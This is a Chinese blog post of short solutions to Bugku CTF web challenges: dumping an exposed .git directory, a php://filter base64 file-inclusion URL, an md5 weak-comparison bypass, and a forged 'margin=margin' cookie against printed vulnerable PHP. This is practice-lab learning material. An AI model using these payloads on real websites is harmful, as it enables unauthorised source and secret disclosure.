备案控制台

开发者社区开发与运维文章正文

bugku web篇（一）

2022-12-02 170

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： bugku web篇（一）

bugku web篇（一）

source

WEB

描　　述: 我哥说渗透我只用linux环境

wget -r http://114.67.246.176:17328/.git

下载后进入目录

cmd

git reflog

git show xxx

xxx为git reflog出来的东西的名字，git show 40c6d51

源代码WEB 已解决

分数: 20 金币: 2

题目作者: harry

一　　血: lsmzr

一血奖励: 1金币

解　　决: 6813

提　　示:

描　　述: 看看源代码？

文件包含

WEB 已解决

描　　述: flag{}

http://xxxx/?file=php://filter/read=convert.base64-encode/resource=index.php

好像需要密码

WEB

描　　述: 好像需要密码

备份是个好习惯

WEB 未解决

描　　述: 备份是个好习惯

1、弱类型比较：科学计数法和数组都可以 2、复写key绕过

dirsearch扫描出bak备份目录，然后分析源码，使用md5绕过

cookies

WEB 未解决

描　　述: cookies欺骗

通过以上python 脚本，即可读取index.php的源代码
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
    '0' =>'keys.txt',
    '1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
    $file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
    $fa = file($file);
    echo $fa[$line];
}
?>
构造Cookie 信息
Cookie: margin=margin
keys.php 进行base64 编码a2V5cy5waHA=

文章标签：

PHP

开发工具

Linux

数据安全/隐私保护

git

关键词：

bugku web

web bugku

5q2a2sugf4ej6

目录

相关文章

香甜可口草莓蛋糕

|

6月前

|

SQL XML 安全

BugKu CTF（Web）：sqli-0x1 & baby lfi & baby lfi 2

BugKu CTF（Web）：sqli-0x1 & baby lfi & baby lfi 2

香甜可口草莓蛋糕

219 2 2

白猫a

|

JavaScript 前端开发

Bugku CTF web 你必须让他停下来解题思路

Bugku CTF web 你必须让他停下来解题思路

白猫a

100 2 2

白猫a

Bugku CTF web GET 解题思路

Bugku CTF web GET 解题思路

白猫a

105 0 0

白猫a

bugku ctf Web POST 解题思路

火狐插件HackBar

白猫a

125 0 0

5q2a2sugf4ej6

|

安全 JavaScript Shell

bugku web篇（二）

bugku web篇（二）

5q2a2sugf4ej6

252 0 0

5q2a2sugf4ej6

|

SQL 安全 PHP

bugku web篇（三）

bugku web篇（三）

5q2a2sugf4ej6

116 0 0

落寞的鱼

|

程序员 Shell PHP

CTF BugKu平台———(Web篇②）

CTF BugKu平台———(Web篇②）总结

落寞的鱼

347 0 0

CTF BugKu平台———(Web篇②）

落寞的鱼

|

Shell PHP 开发工具

CTF BugKu平台—(Web篇①）

CTF BugKu平台—(Web篇①）

落寞的鱼

547 0 0

土木林森

|

1月前

|

XML JSON API

ServiceStack：不仅仅是一个高性能Web API和微服务框架，更是一站式解决方案——深入解析其多协议支持及简便开发流程，带您体验前所未有的.NET开发效率革命

【10月更文挑战第9天】ServiceStack 是一个高性能的 Web API 和微服务框架，支持 JSON、XML、CSV 等多种数据格式。它简化了 .NET 应用的开发流程，提供了直观的 RESTful 服务构建方式。ServiceStack 支持高并发请求和复杂业务逻辑，安装简单，通过 NuGet 包管理器即可快速集成。示例代码展示了如何创建一个返回当前日期的简单服务，包括定义请求和响应 DTO、实现服务逻辑、配置路由和宿主。ServiceStack 还支持 WebSocket、SignalR 等实时通信协议，具备自动验证、自动过滤器等丰富功能，适合快速搭建高性能、可扩展的服务端应用。

土木林森

113 3 3

土木林森

|

22天前

|

设计模式前端开发数据库

Python Web开发：Django框架下的全栈开发实战

【10月更文挑战第27天】本文介绍了Django框架在Python Web开发中的应用，涵盖了Django与Flask等框架的比较、项目结构、模型、视图、模板和URL配置等内容，并展示了实际代码示例，帮助读者快速掌握Django全栈开发的核心技术。

土木林森

122 45 45

热门文章

最新文章

阿里云Web应用托管服务(web+)如何使用命令行工具变更部署环境配置?

测试Flask+PYTHON的WEB框架

web QQ页面内发现一首诗

Creating top-down Web services using MyEclipse

使用Axis2来构建Web Service客户端

【ASP.NET Web API教程】2.4 创建Web API的帮助页面

WASC Announcement: Announcing the Web Application Security Scanner Evaluation Criteria v1

《Flash建站技术》系列3-步入web殿堂

centos curl web站点监控实践

ASP.NET2.0里的web.config配置接口API(转)

MVC（模型-视图-控制器）是一种在Web应用程序开发中广泛使用的软件设计模式

在Python Web开发中，测试是一个至关重要的环节

深入探索Spring Boot Web应用源码及实战应用

golang学习7，glang的web的restful接口结构体传参

golang学习6，glang的web的restful接口传参

golang学习5，glang的web的restful接口

golang学习4，glang的web接口

golang学习3，golang 项目中配置gin的web框架

LabVIEW开发基于Web数字图像处理

LabVIEWCompactRIO 开发指南23 Web服务

相关课程

更多

Python Web开发基础

Java Web开发系列课程 - Spring框架入门

企业Web常用架构LAMP-LNMP实战

高校精品课-西安交通大学-Web 编程技术

Java Web项目实战 - 图书商城

Java面试疑难点解析 - Java Web开发

相关电子书

更多

Web应用系统性能优化

高性能Web架构之缓存体系

PWA:移动Web的现在与未来

相关实验场景

更多

每个IT人都想学的“Web应用上云经典架构”实战

使用SLB+2ECS+NAS，部署电商web网站的高可用架构

1分钟SAE部署Web在线游戏

Html5和Webpack3：Webpack5的常见用法

云上Web及FTP

WEB网页编程实战

下一篇

无影云桌面